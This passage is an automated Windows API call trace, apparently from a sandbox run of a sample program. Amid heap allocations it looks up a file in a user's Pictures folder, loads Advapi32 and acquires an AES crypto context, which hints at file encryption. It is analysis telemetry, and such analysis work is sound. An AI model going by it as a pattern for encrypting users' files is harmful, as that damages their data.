(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0256.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.297] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0256.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0256.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.299] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yuOTM-ydpavUWyQnpT.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe435730, ftCreationTime.dwHighDateTime=0x1d5e8ad, ftLastAccessTime.dwLowDateTime=0x2a789f0, ftLastAccessTime.dwHighDateTime=0x1d5eb46, ftLastWriteTime.dwLowDateTime=0x2a789f0, ftLastWriteTime.dwHighDateTime=0x1d5eb46, nFileSizeHigh=0x0, nFileSizeLow=0x11daa, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="yuOTM-ydpavUWyQnpT.gif", cAlternateFileName="YUOTM-~1.GIF")) returned 0xa870d0 [0256.299] FindClose (in: hFindFile=0xa870d0 | out: hFindFile=0xa870d0) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0256.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.299] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.300] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0256.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.300] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0256.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0256.301] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.301] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.301] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0256.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0256.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0256.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0256.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0256.373] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.374] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0256.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0256.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0256.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0256.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.377] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.377] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0256.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.377] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0256.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0256.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0256.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0256.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0256.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0256.378] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 